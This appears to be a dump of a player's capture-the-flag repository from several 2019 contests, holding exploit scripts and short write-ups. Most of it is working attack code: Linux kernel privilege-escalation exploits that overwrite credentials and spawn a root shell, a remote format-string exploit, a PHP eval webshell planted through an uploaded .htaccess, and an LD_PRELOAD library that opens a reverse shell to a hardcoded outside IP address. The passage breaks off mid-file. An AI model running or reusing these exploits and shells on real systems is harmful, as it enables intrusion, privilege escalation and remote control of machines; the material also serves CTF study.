-------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/libc.s: -------------------------------------------------------------------------------- 1 | __syscall: 2 | stmfd sp!, {r4, r5, r7, lr} 3 | ldr r4, [sp, #16] 4 | ldr r5, [sp, #20] 5 | mov r7, r12 6 | swi #0 7 | 8 | cmn r0, #4096 9 | rsbcs r2, r0, #0 10 | ldrcs r3, =errno 11 | mvncs r0, #0 12 | strcs r2, [r3] 13 | ldmfd sp!, {r4, r5, r7, pc} 14 | 15 | .global errno 16 | errno: 17 | .word 0 18 | 19 | .global _exit 20 | _exit: 21 | mov r12, #1 22 | b __syscall 23 | 24 | .global read 25 | read: 26 | mov r12, #3 27 | b __syscall 28 | 29 | .global write 30 | write: 31 | mov r12, #4 32 | b __syscall 33 | 34 | .global open 35 | open: 36 | mov r12, #5 37 | b __syscall 38 | 39 | .global close 40 | close: 41 | mov r12, #6 42 | b __syscall 43 | 44 | .global pipe 45 | pipe: 46 | mov r12, #42 47 | b __syscall 48 | 49 | .global mmap 50 | mmap: 51 | mov r12, #192 52 | b __syscall 53 | 54 | .global munmap 55 | munmap: 56 | mov r12, #91 57 | b __syscall 58 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/readme.md: -------------------------------------------------------------------------------- 1 | # 1118daysober 2 | 3 | ## PoC 4 | 5 | - https://github.com/ThomasKing2014/android-Vulnerability-PoC/blob/master/CVE-2015-8966/poc.c 6 | 7 | ```c 8 | #define _GNU_SOURCE 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | int try_to_read_kernel(){ 30 | int pipefd[2]; 31 | ssize_t len; 32 | ssize_t try_bytes = 4; 33 | 34 | pipe(pipefd); 35 | len = write(pipefd[1], (void*)0xc0008000, try_bytes); 36 | 37 | close(pipefd[0]); 38 | close(pipefd[1]); 39 | 40 | return len == try_bytes; 41 | } 42 | 43 | __attribute__((naked)) long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, unsigned long arg){ 44 | 45 | __asm __volatile ( 46 | "swi 0x9000DD\n" 47 | "mov pc, lr\n" 48 | : 49 | : 50 | : 51 | ); 52 | } 53 | 54 | #define F_OFD_GETLK 36 55 | #define F_OFD_SETLK 37 56 | #define F_OFD_SETLKW 38 57 | 58 | 59 | int main(int argc, char const *argv[]){ 60 | int fd = open("/proc/cpuinfo", O_RDONLY); 61 | struct flock *map_base = 0; 62 | 63 | if(fd == -1){ 64 | perror("open"); 65 | return -1; 66 | } 67 | map_base = (struct flock *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 68 | if(map_base == (void*)-1){ 69 | perror("mmap"); 70 | goto _done; 71 | } 72 | printf("map_base %p\n", map_base); 73 | memset(map_base, 0, 0x1000); 74 | map_base->l_start = SEEK_SET; 75 | if(sys_oabi_fcntl64(fd, F_OFD_GETLK, (long)map_base)){ 76 | perror("sys_oabi_fcntl64"); 77 | } 78 | // Arbitrary kernel read/write test 79 | if(try_to_read_kernel()){ 80 | printf("pwnned !\n"); 81 | } 82 | munmap(map_base, 0x1000); 83 | _done: 84 | close(fd); 85 | return 0; 86 | } 87 | ``` 88 | 89 | ## Vuln 90 | 91 | - kernel doesn't restore to user_ds. So, we can write any data at any kernel address. 92 | - so that I can't force to restore user_ds. 93 | - detail: https://thomasking2014.com/2016/12/05/CVE-2015-8966.html 94 | 95 | ## Exploit 96 | 97 | - I use read data with o/r/w syscall. It doesn't use user space address, so kernel was not crashed. 98 | 99 | ```c 100 | int junofd = open("./tmp", O_WRONLY); 101 | write(junofd, f_task, 4); 102 | close(junofd); 103 | 104 | int junofd2 = open("./tmp_cred", O_WRONLY); 105 | write(junofd, f_task+400-4, 4); 106 | close(junofd); 107 | ``` 108 | 109 | - save task_structure's next ptr to ./tmp and task's cred ptr to ./tmp_cred 110 | - run until comm equals to `sh`. 111 | 112 | ```c 113 | write(pipefd[1], cred+0x30, 4); 114 | read(pipefd[0], cred+4, 4); 115 | write(pipefd[1], cred+0x30, 4); 116 | read(pipefd[0], cred+8, 4); 117 | write(pipefd[1], cred+0x30, 4); 118 | read(pipefd[0], cred+12, 4); 119 | write(pipefd[1], cred+0x30, 4); 120 | read(pipefd[0], cred+16, 4); 121 | write(pipefd[1], cred+0x30, 4); 122 | read(pipefd[0], cred+20, 4); 123 | write(pipefd[1], cred+0x30, 4); 124 | read(pipefd[0], cred+24, 4); 125 | write(pipefd[1], cred+0x30, 4); 126 | read(pipefd[0], cred+28, 4); 127 | write(pipefd[1], cred+0x30, 4); 128 | read(pipefd[0], cred+32, 4); 129 | ``` 130 | 131 | - finally overwrite cred value (0x3e8 to 0x0) 132 | - I moved binary file with `base64` command. 133 | 134 | ``` 135 | ~ $ ./w 136 | [+] gogo cred haha 137 | do 138 | done! 139 | /home/user # id 140 | uid=0(root) gid=0 groups=1000 141 | ``` 142 | 143 | -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/..htaccess: -------------------------------------------------------------------------------- 1 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 2 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 3 | AddType application/x-httpd-php .txt 4 | php_value auto_prepend_file "php://filter/convert.quoted-printable-decode/resource=./juno.asdf" -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | gcc -c -fPIC hack.c -o hack 3 | gcc -shared hack -o hack.so 4 | curl -F 'xxx=@./hack.so' http://35.246.234.136/images/c5d06e5d63a2d5b6ec392969fd4eac658f8f82d9/exp.txt 5 | -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/exp.txt: -------------------------------------------------------------------------------- 1 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 2 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 3 | # asdf -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/hack.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define REMOTE_ADDR "174.138.24.108" 13 | #define REMOTE_PORT 80 14 | 15 | 16 | void payload() { 17 | sigignore(SIGALRM); 18 | 19 | struct sockaddr_in sa; 20 | int s; 21 | 22 | sa.sin_family = AF_INET; 23 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 24 | sa.sin_port = htons(REMOTE_PORT); 25 | 26 | s = socket(AF_INET, SOCK_STREAM, 0); 27 | connect(s, (struct sockaddr *)&sa, sizeof(sa)); 28 | 29 | dup2(s, 0); 30 | dup2(s, 1); 31 | dup2(s, 2); 32 | 33 | // execve("/bin/sh", 0, 0); 34 | 35 | chdir("/"); 36 | execve("/get_flag", 0, 0); 37 | 38 | } 39 | 40 | uid_t geteuid() { 41 | if(getenv("LD_PRELOAD") == NULL) { return 0; } 42 | unsetenv("LD_PRELOAD"); 43 | payload(); 44 | } 45 | -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/juno.asdf: -------------------------------------------------------------------------------- 1 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 2 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 3 | =0A=3c?php error_reporting(E_ALL); ini_set("display_errors", 1); eval($_GET[x]); 4 | // move_uploaded_file($_FILES['xxx']['tmp_name'], '/var/www/html/images/c5d06e5d63a2d5b6ec392969fd4eac658f8f82d9/xx.so'); 5 | // phpinfo(); 6 | ?> -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/readme.md: -------------------------------------------------------------------------------- 1 | # l33t-hoster 2 | 3 | ## Vuln 4 | 5 | ```php 6 | $tmp_name = $_FILES["image"]["tmp_name"]; 7 | $name = $_FILES["image"]["name"]; 8 | $parts = explode(".", $name); 9 | $ext = array_pop($parts); 10 | 11 | if (empty($parts[0])) { 12 | array_shift($parts); 13 | } 14 | 15 | if (count($parts) === 0) { 16 | die("lol filename is empty"); 17 | } 18 | ``` 19 | - We can upload .htaccess file with `..htaccess` filename. 20 | - But we have to bypass getimagesize. 21 | - Since getimagesize lazy checks image header, only some signatures, width and height. 22 | - We have to apache .htaccess's bad characters e.g.) non valid chracters except #(comment) 23 | - See the following source code. 24 | - https://github.com/php/php-src/blob/master/ext/standard/image.c#L1381 25 | - https://github.com/php/php-src/blob/master/ext/standard/image.c#L1033 26 | 27 | ```c 28 | if (php_get_xbm(stream, NULL)) { 29 | return IMAGE_FILETYPE_XBM; 30 | } 31 | return IMAGE_FILETYPE_UNKNOWN; 32 | ``` 33 | 34 | ```c 35 | static int php_get_xbm(php_stream *stream, struct gfxinfo **result) 36 | { 37 | char *fline; 38 | char *iname; 39 | char *type; 40 | int value; 41 | unsigned int width = 0, height = 0; 42 | 43 | if (result) { 44 | *result = NULL; 45 | } 46 | if (php_stream_rewind(stream)) { 47 | return 0; 48 | } 49 | while ((fline=php_stream_gets(stream, NULL, 0)) != NULL) { 50 | iname = estrdup(fline); /* simple way to get necessary buffer of required size */ 51 | if (sscanf(fline, "#define %s %d", iname, &value) == 2) { 52 | if (!(type = strrchr(iname, '_'))) { 53 | type = iname; 54 | } else { 55 | type++; 56 | } 57 | 58 | if (!strcmp("width", type)) { 59 | width = (unsigned int) value; 60 | if (height) { 61 | efree(iname); 62 | break; 63 | } 64 | } 65 | if (!strcmp("height", type)) { 66 | height = (unsigned int) value; 67 | if (width) { 68 | efree(iname); 69 | break; 70 | } 71 | } 72 | } 73 | efree(fline); 74 | efree(iname); 75 | } 76 | if (fline) { 77 | efree(fline); 78 | } 79 | 80 | if (width && height) { 81 | if (result) { 82 | *result = (struct gfxinfo *) ecalloc(1, sizeof(struct gfxinfo)); 83 | (*result)->width = width; 84 | (*result)->height = height; 85 | } 86 | return IMAGE_FILETYPE_XBM; 87 | } 88 | 89 | return 0; 90 | } 91 | ``` 92 | - If there is a line with `#define %s %d`, we can put any lines in the file. 93 | - So if we make .htaccess file like this. 94 | 95 | ``` 96 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 97 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 98 | blahblah 99 | ``` 100 | 101 | - We can easily bypass the getimagesize filter. 102 | 103 | ## Exploit 104 | 105 | ### RCE 106 | 107 | - Now we can upload .htaccess with arbitrary data. 108 | - auto_prepend value supports php protocol, we can run the php script. 109 | - However there is another filter. (if file contains ` 119 | ``` 120 | 121 | ### SBX Escape 122 | 123 | - There are disable_functions :( . 124 | ``` 125 | pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,posix_mkfifo, pg_lo_import, dbmopen, dbase_open, popen, chgrp, chown, chmod, symlink,apache_setenv,define_syslog_variables, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_uname, proc_close, pclose, proc_nice, proc_terminate,curl_exec,curl_multi_exec,parse_ini_file,show_source,imap_open,fopen,copy,rename,readfile,readlink,tmpfile,tempnam,touch,link,file_put_contents,file,ftp_connect,ftp_ssl_connect, 126 | ``` 127 | - We can use LD_PRELOAD and mail trick to escape SBX. (https://blog.csdn.net/qq_27446553/article/details/80235811) 128 | - I used reverse shell. 129 | 130 | ### Bypass Alarm. 131 | 132 | - There is a simple captcha, but the alarm occurs in 0.01sec. 133 | 134 | ``` 135 | newa.it_value.tv_sec = 0LL; 136 | newa.it_value.tv_usec = 10000LL; // 1000000 137 | newa.it_interval.tv_sec = 0LL; 138 | newa.it_interval.tv_usec = 0LL; 139 | setitimer(ITIMER_REAL, &newa, 0LL); 140 | ``` 141 | - We can ignore sigalrm with sigignore function. 142 | 143 | ``` 144 | sigignore(SIGALRM); 145 | 146 | ``` 147 | 148 | -------------------------------------------------------------------------------- /2019/midnightctf/hfsipc/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define HFS_CREATE 0xABCD0001 7 | #define HFS_DESTROY 0xABCD0002 8 | #define HFS_READ 0xABCD0003 9 | #define HFS_WRITE 0xABCD0004 10 | 11 | // from gist 12 | void dumpHex(const void* data, size_t size) { 13 | char ascii[17]; 14 | size_t i, j; 15 | ascii[16] = '\0'; 16 | for (i = 0; i < size; ++i) { 17 | printf("%02X ", ((unsigned char*)data)[i]); 18 | if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { 19 | ascii[i % 16] = ((unsigned char*)data)[i]; 20 | } else { 21 | ascii[i % 16] = '.'; 22 | } 23 | if ((i+1) % 8 == 0 || i+1 == size) { 24 | printf(" "); 25 | if ((i+1) % 16 == 0) { 26 | printf("| %s \n", ascii); 27 | } else if (i+1 == size) { 28 | ascii[(i+1) % 16] = '\0'; 29 | if ((i+1) % 16 <= 8) { 30 | printf(" "); 31 | } 32 | for (j = (i+1) % 16; j < 16; ++j) { 33 | printf(" "); 34 | } 35 | printf("| %s \n", ascii); 36 | } 37 | } 38 | } 39 | } 40 | 41 | struct HFS_CREATE_DATA { 42 | uint64_t HFS_ID; 43 | uint64_t HFS_SIZE; 44 | }; 45 | 46 | struct HFS_DESTROY_DATA { 47 | uint64_t HFS_ID; 48 | }; 49 | 50 | struct HFS_READ_DATA { 51 | uint64_t HFS_ID; 52 | uint64_t HFS_SIZE; 53 | char** USER_BUF; 54 | }; 55 | 56 | struct HFS_WRITE_DATA { 57 | uint64_t HFS_ID; 58 | uint64_t HFS_SIZE; 59 | char* USER_BUF; 60 | }; 61 | 62 | int fd; 63 | long long int ret; 64 | unsigned char buf[0x1000]; 65 | unsigned char i_buf[0x1000]; 66 | unsigned char w_buf[0x1000]; 67 | 68 | struct HFS_CREATE_DATA hcd; 69 | struct HFS_DESTROY_DATA hdd; 70 | struct HFS_READ_DATA hrd; 71 | struct HFS_WRITE_DATA hwd; 72 | 73 | 74 | void aWrite(uint64_t ptr, uint64_t size) { 75 | memset(buf, 0, 0x1000); 76 | 77 | hwd.HFS_ID = 0x70; 78 | hwd.HFS_SIZE = 0x50; 79 | hwd.USER_BUF = buf; 80 | 81 | memcpy(buf, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x8); // size 82 | memcpy(buf+0x30, "\x61\x00\x00\x00\x00\x00\x00\x00", 0x08); // next obj header (id) 83 | memcpy(buf+0x30+0x8, &ptr, 0x08); // next obj ptr 84 | memcpy(buf+0x30+0x10, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x08); // next obj size 85 | ret = ioctl(fd, HFS_WRITE, &hwd); 86 | printf("write ret: %llx\n", ret); 87 | 88 | memset(w_buf, 0, 0x1000); 89 | hwd.HFS_ID = 0x61; 90 | hwd.HFS_SIZE = size; 91 | hwd.USER_BUF = w_buf; 92 | ret = ioctl(fd, HFS_WRITE, &hwd); 93 | printf("overwrite ret: %llx\n", ret); 94 | 95 | } 96 | 97 | void aRead(uint64_t ptr, uint64_t size) { 98 | memset(buf, 0, 0x1000); 99 | 100 | hwd.HFS_ID = 0x70; 101 | hwd.HFS_SIZE = 0x50; 102 | hwd.USER_BUF = buf; 103 | 104 | memcpy(buf, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x8); // size 105 | memcpy(buf+0x30, "\x61\x00\x00\x00\x00\x00\x00\x00", 0x08); // next obj header (id) 106 | memcpy(buf+0x30+0x8, &ptr, 0x08); // next obj ptr 107 | memcpy(buf+0x30+0x10, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x08); // next obj size 108 | ioctl(fd, HFS_WRITE, &hwd); 109 | 110 | memset(i_buf, 0, 0x1000); 111 | hrd.HFS_ID = 0x61; 112 | hrd.HFS_SIZE = size; 113 | hrd.USER_BUF = i_buf; 114 | ioctl(fd, HFS_READ, &hrd); 115 | 116 | } 117 | 118 | int main(int argc, char **argv) { 119 | 120 | fd = open(argv[1], O_RDWR); 121 | if (fd < 0) { 122 | printf("failed to open ioctl\n"); 123 | exit(-1); 124 | return -1; 125 | } 126 | 127 | hcd.HFS_ID = 0x4140; 128 | hcd.HFS_SIZE = 0x20; 129 | ret = ioctl(fd, HFS_CREATE, &hcd); 130 | printf("ret: %llx\n", ret); // pad for offset 131 | 132 | 133 | hcd.HFS_ID = 0x4142; 134 | hcd.HFS_SIZE = 0x20; 135 | ret = ioctl(fd, HFS_CREATE, &hcd); 136 | printf("ret: %llx\n", ret); 137 | 138 | hcd.HFS_ID = 0x00; 139 | hcd.HFS_SIZE = 0x20; 140 | ret = ioctl(fd, HFS_CREATE, &hcd); 141 | printf("x ret: %llx\n", ret); 142 | 143 | hcd.HFS_ID = 0x60; // vuln object 144 | hcd.HFS_SIZE = 0x20; 145 | ret = ioctl(fd, HFS_CREATE, &hcd); 146 | printf("ret: %llx\n", ret); 147 | 148 | hwd.HFS_ID = 0x60; 149 | hwd.HFS_SIZE = 0x21; 150 | hwd.USER_BUF = buf; 151 | 152 | memcpy(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x28", 0x21); // need to fit the offset. 153 | ret = ioctl(fd, HFS_WRITE, &hwd); 154 | printf("write ret: %llx\n", ret); 155 | 156 | hcd.HFS_ID = 0x61; // vuln object 157 | hcd.HFS_SIZE = 0x20; 158 | ret = ioctl(fd, HFS_CREATE, &hcd); 159 | printf("ret: %llx\n", ret); 160 | 161 | hcd.HFS_ID = 0x62; // vuln object 162 | hcd.HFS_SIZE = 0x20; 163 | ret = ioctl(fd, HFS_CREATE, &hcd); 164 | printf("ret: %llx\n", ret); 165 | 166 | hwd.HFS_ID = 0x61; 167 | hwd.HFS_SIZE = 0x21; 168 | hwd.USER_BUF = buf; 169 | 170 | printf("[+] Overwriting Offset ..\n"); 171 | 172 | memcpy(buf+0x10+0x8, "\x70\x00\x00\x00\x00\x00\x00\x00", 0x8); // overwrite id 173 | memcpy(buf+0x10+0x10, "\x50", 0x1); // overwrite offset 174 | 175 | ret = ioctl(fd, HFS_WRITE, &hwd); 176 | printf("write ret: %llx\n", ret); 177 | 178 | // overwrite size 179 | 180 | hwd.HFS_ID = 0x70; 181 | hwd.HFS_SIZE = 0x8; 182 | hwd.USER_BUF = buf; 183 | 184 | printf("[+] Overwriting Size ..\n"); 185 | 186 | memcpy(buf, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x8); // overwrite size 187 | 188 | ret = ioctl(fd, HFS_WRITE, &hwd); 189 | printf("write ret: %llx\n", ret); 190 | 191 | 192 | for (uint64_t i=0xffff880005000000; i<=0xffff880006fff000; i+=0x1000) { 193 | aRead(i, 0x1000); 194 | 195 | for (int j=0; j< 0x1000; j+= 4) { 196 | if (i_buf[j] == 0xe8 && i_buf[j+1] == 0x03 && i_buf[j+2] == 0x00&& i_buf[j+3] == 0x00) { 197 | printf("found!: %llx\n", i+j); 198 | memset(w_buf, 0, 4); 199 | aWrite(i+j, 4); 200 | } 201 | } 202 | 203 | // printf("[%llx]\n", i); 204 | // dumpHex(i_buf, 0x1000); 205 | } 206 | 207 | aRead(0xffffffffa0000000, 0x100); 208 | dumpHex(i_buf, 0x100); 209 | 210 | setuid(0); 211 | 212 | system("ls -al /root"); 213 | system("cat /root/*"); 214 | system("/bin/sh"); 215 | 216 | return 0; 217 | } 218 | -------------------------------------------------------------------------------- /2019/midnightctf/hfsipc/make.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | gcc -o exploit exploit.c -static -w 3 | tar -czf x.tar.gz exploit 4 | base64 x.tar.gz 5 | -------------------------------------------------------------------------------- /2019/opcde_mini/custom_printf_public/readme.md: -------------------------------------------------------------------------------- 1 | - custom format string printf. 2 | -------------------------------------------------------------------------------- /2019/opcde_mini/custom_printf_public/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import ctypes 3 | 4 | 5 | OP_OVERWRITE = '\xf0\x9f\x98\xa1' 6 | OP_STRLEN = '\xf0\x9f\x98\x82' 7 | OP_LEAK = '\xf0\x9f\xa4\x94' 8 | 9 | leak_payload = 'GRI' + OP_LEAK + 'GOL' + OP_LEAK + 'JUNO' + OP_LEAK + 'IM' 10 | 11 | def overwrite(target, byte): 12 | payload = '' 13 | payload += OP_LEAK * 7 14 | payload += OP_LEAK * 16 15 | payload += OP_LEAK * 14 16 | 17 | if byte < 0x60: 18 | payload += ' '*byte 19 | elif byte < 0x90: 20 | payload += '\xF0\x9F\x95\x9b' 21 | payload += '\xF0\x9F\x95\x95' 22 | payload += ' ' * (byte-0x60+1) 23 | elif byte < 0xb0: 24 | payload += '\xF0\x9F\x95\x9b' 25 | payload += '\xF0\x9F\x95\x98' 26 | payload += ' ' * (byte-0x90+1) 27 | elif byte < 0xd0: 28 | payload += '\xF0\x9F\x95\x9b' 29 | payload += '\xF0\x9F\x95\x98' 30 | payload += ' \xF0\x9F\x95\x9b' 31 | payload += '\xF0\x9F\x95\x91' 32 | payload += ' ' * (byte-0xb0+1) 33 | elif byte < 0x100: 34 | payload += '\xF0\x9F\x95\x9b' 35 | payload += '\xF0\x9F\x95\x98' 36 | payload += ' \xF0\x9F\x95\x9b' 37 | payload += '\xF0\x9F\x95\x93' 38 | payload += ' ' * (byte-0xd0+1) 39 | 40 | payload += '\xf0\x9f\x98\xa1' 41 | 42 | payload = payload.ljust(0xf0, '_') 43 | 44 | payload += p64(target) 45 | 46 | return payload 47 | 48 | 49 | # context.log_level = 'debug' 50 | context.terminal = ['tmux', 'splitw', '-h'] 51 | 52 | # r = process('./custom_printf')#, aslr=False) 53 | r = remote('54.64.183.252', 20008) 54 | # r = remote('192.168.10.226', 20008) 55 | 56 | script = ''' 57 | b *0x0000000000401A8F 58 | # b *0x0000000000400BE2 59 | b *0x400ffa 60 | c 61 | ''' 62 | 63 | r.sendline(leak_payload) 64 | 65 | r.recvuntil('GRI') 66 | data = int(r.recvuntil('GOL').replace('GOL', '')) 67 | 68 | _ = ctypes.c_uint32(data + 0x1049) 69 | w = _.value + 0x7fff00000000 70 | print 'RET STACK', hex(w) 71 | 72 | r.recvuntil('JUNO') 73 | data = int(r.recvuntil('IM').replace('IM', '')) 74 | 75 | _ = ctypes.c_uint32(data - 0x00000000000F7260) 76 | print 'LIBC', hex(_.value) 77 | 78 | q = _.value 79 | 80 | libc = {} 81 | libc[0] = q + 0x45216 82 | libc[1] = q + 0x4526a 83 | libc[2] = q + 0xf02a4 84 | libc[3] = q + 0xf1147 # use this 85 | 86 | r.sendline(overwrite(w, libc[3] & 0xff)) 87 | r.sendline(overwrite(w + 1, (libc[3] >> 8) & 0xff)) 88 | r.sendline(overwrite(w + 2, (libc[3] >> 16) & 0xff)) 89 | r.sendline('bye') 90 | 91 | r.sendline('id') 92 | r.sendline('cat /flag') 93 | 94 | # r.sendline(payload) 95 | 96 | ''' 97 | b *0x0000000000401A8F 98 | b *0x0000000000401AE6 99 | ''' 100 | 101 | r.interactive() -------------------------------------------------------------------------------- /2019/opcde_mini/misconf_public/main.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | from flask import Flask 4 | from flask import Flask, flash, redirect, render_template, request, session, abort, url_for 5 | 6 | app = Flask(__name__) 7 | app.debug = False 8 | app.secret_key = 'wkadkswkrhcnfrmsgkslsjanvlrhsgkek1234' 9 | 10 | 11 | @app.route("/") 12 | def index(): 13 | if not session.get('logged_in'): 14 | return render_template('index.html') 15 | else: 16 | if session['role'] == 'guest': 17 | message = open('./static/message').read() 18 | elif session['role'] == 'admin': 19 | message = open('/flag').read() 20 | 21 | return render_template('login.html', message=message) 22 | 23 | @app.route("/login", methods=['POST']) 24 | def login(): 25 | if request.method != 'POST': 26 | return redirect(url_for('index')) 27 | 28 | username = request.form.get('username') 29 | password = request.form.get('password') 30 | 31 | if username and password: 32 | session['logged_in'] = True 33 | session['username'] = username 34 | session['password'] = password 35 | session['role'] = 'admin' 36 | 37 | return redirect(url_for('index')) 38 | 39 | 40 | @app.route("/logout") 41 | def logout(): 42 | if session.get('logged_in'): 43 | for key in list(session.keys()): 44 | session.pop(key) 45 | 46 | return redirect(url_for('index')) 47 | 48 | 49 | if __name__ == "__main__": 50 | app.run(host="0.0.0.0", port=80) 51 | -------------------------------------------------------------------------------- /2019/opcde_mini/misconf_public/readme.md: -------------------------------------------------------------------------------- 1 | - There is a mis configuration for nginx alias. 2 | - Hence we can get a main.py that containing real secret_key. (http://54.64.183.252:8080/static../main.py) 3 | - Make role=admin session with secret_key! 4 | -------------------------------------------------------------------------------- /2019/plaid/potent/solve.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | 4 | import requests 5 | 6 | from pwn import * 7 | 8 | import zlib 9 | 10 | 11 | headers = { 12 | 'Origin': 'http://quotables.pwni.ng:1337', 13 | 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 14 | } 15 | 16 | 17 | # using ascii-zip 18 | wow = 'D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAtwwwEtswGpDttpDDwt3ww03sG333333swwG03333sDDdFPiOMwSgoZOwMYzcoogqffVAaFVvaFvQFVaAfgkuSmVvNnFsOzyifOMwSgoy4' 19 | 20 | 21 | data = { 22 | 'quote': 'HTTP/1.0 200 OK\r\nHTTP/1.0 302 OK\r\nContent-Encoding: deflate\r\nContent-Type: text/html;\r\nContent-Lexngth: {length}\r\n\r\n'.format(length=len(wow)) + wow, 23 | 'attribution': '' 24 | } 25 | 26 | response = requests.post('http://quotables.pwni.ng:1337/quotes/new', headers=headers, data=data) 27 | # response = requests.post('http://quotables.pwni.ng:1337/quotes/new', headers=headers, files=files) 28 | key = response.history[0].headers['Location'].split('quote#')[1] 29 | 30 | from pwn import * 31 | 32 | r = remote('quotables.pwni.ng', 1337) 33 | r.sendline('''GET /api/quote/{target} HTTP/0.9 34 | Connection: keep-alive 35 | Host: quotables.pwni.ng:1337 36 | Range: bytes=0-2 37 | Cache-Control: max-age=0 38 | Upgrade-Insecure-Requests: 1 39 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3 40 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 41 | Content-Transfer-Encoding: BASE64 42 | Accept-Charset: iso-8859-15 43 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 44 | Proxy-Connection: close 45 | 46 | '''.replace('\n', '\r\n').format(target=key)) 47 | 48 | r.close() 49 | 50 | url = 'http://quotables.pwni.ng:1337/api/quote/' + key 51 | 52 | print '-'*20 53 | print url 54 | 55 | c = requests.post(url) 56 | # print c.content.encode('hex') 57 | 58 | qwer = c.content.split('\r\n\r\n')[1] 59 | print qwer.encode('hex') 60 | # print brotli.decompress(qwer)[:-3] 61 | 62 | 63 | c = requests.get(url) 64 | print c.text 65 | -------------------------------------------------------------------------------- /2019/plaid/spectre/readme.md: -------------------------------------------------------------------------------- 1 | # spectre 2 | 3 | - I assisted @_bincat 4 | - exploit: https://github.com/bincat99/pwn/blob/master/plaid-2019/spectre/sol.py 5 | -------------------------------------------------------------------------------- /2019/plaid/spectre/upload_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys, time 4 | 5 | from requests import get, post 6 | from pprint import pprint 7 | 8 | try: 9 | my_file = sys.argv[2] 10 | except: 11 | my_file = None 12 | 13 | 14 | token = sys.argv[1] 15 | 16 | url = 'http://spectre.pwni.ng:4000/' 17 | files = { 18 | 'script': open(my_file if my_file else 'bin.bin', 'rb'), 19 | } 20 | 21 | data = { 22 | 'pow': token 23 | } 24 | 25 | c = post(url, data=data, files=files) 26 | result = c.history[0].headers['Location'] 27 | 28 | while True: 29 | c = get(result) 30 | data = c.content 31 | 32 | if not '00000000 00000000' in data: 33 | time.sleep(1) 34 | continue 35 | 36 | break 37 | 38 | if '00000000 00000000' in data: 39 | # processing 4141 mem 40 | mem = [] 41 | _ = data.split('
')[1].split('
')[0].strip().replace(' ', '').replace('\n', '') 42 | for i in xrange(0, len(_), 16): 43 | low = int(_[i: i+8], 16) 44 | high = int(_[i+8: i+16], 16) << 32 45 | q = low + high 46 | if q == 0: q = 0xffffffff 47 | mem.append(q) 48 | 49 | print(mem) 50 | print(min(mem)) 51 | print(mem.index(min(mem))) 52 | 53 | 54 | 55 | else: 56 | print(data) 57 | -------------------------------------------------------------------------------- /2019/plaid/triggerd/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from requests import post, get 3 | import thread 4 | import time 5 | import os 6 | 7 | url = 'http://triggered.pwni.ng:52856/register' 8 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 9 | data = {'username': 'juno1234xx'+os.urandom(3).encode('hex')} 10 | data['password'] = 'A'*4096*2 11 | data['confirm-password'] = data['password'] 12 | c = post(url=url, data=data, headers=headers) 13 | print c.history 14 | print c.content 15 | 16 | print '-------------------------' 17 | time.sleep(1) 18 | 19 | r1 = remote('triggered.pwni.ng', 52856) 20 | r2 = remote('triggered.pwni.ng', 52856) 21 | 22 | session = 'f4bf90e2-e6a7-4980-80e4-a9559adf3380' 23 | 24 | def go1(): 25 | global session, r1, data 26 | r1.sendline('''POST /login HTTP/1.1 27 | Host: 